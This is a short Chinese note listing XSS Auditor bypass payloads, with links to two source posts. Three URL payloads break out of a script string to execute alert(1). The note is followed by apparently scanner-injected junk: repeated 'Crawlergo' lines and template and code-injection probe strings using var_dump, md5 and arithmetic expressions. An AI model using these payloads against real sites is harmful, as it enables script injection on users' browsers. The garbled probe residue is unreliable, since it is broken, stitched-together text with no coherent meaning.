XSS Auditor bypass
原文地址:
http://www.thespanner.co.uk/2015/02/10/xss-auditor-bypass/
http://www.thespanner.co.uk/2015/02/19/another-xss-auditor-bypass/
对于如下的输入点:
<script>x = "MY INJECTION"</script>
payload:
2.php?x=</script><svg><script>alert(1)%2b%26quot;
3.php?x="><script/src=data:,alert(1)%2b"
3.php?x="><script/src=data:,alert(1)%26sol;%26sol;
Crawlergo
Crawlergo
Crawlergo
'+(41328*43410)+'
Crawlergo
Crawlergo
Crawlergo
Crawlergo
Crawlergo
Crawlergo
Crawlergo
${@var_dump(md5(409628361))};
Crawlergo
Crawlergo
Crawlergo
oipnjwusfrlsqxjbqgcb
'-var_dump(md5(636207763))-'
/*1*/{{902266414+911104401}}
Crawlergo
Crawlergo
${845998501+862908899}
Crawlergo
Crawlergo
Crawlergo
Crawlergo
Crawlergo
${(875128168+866715479)?c}
Crawlergo
Crawlergo
Crawlergo
Crawlergo
${837521582+939155449}
#set($c=959448014+878577088)${c}$c
Crawlergo
Crawlergo
Crawlergo
Crawlergo
Crawlergo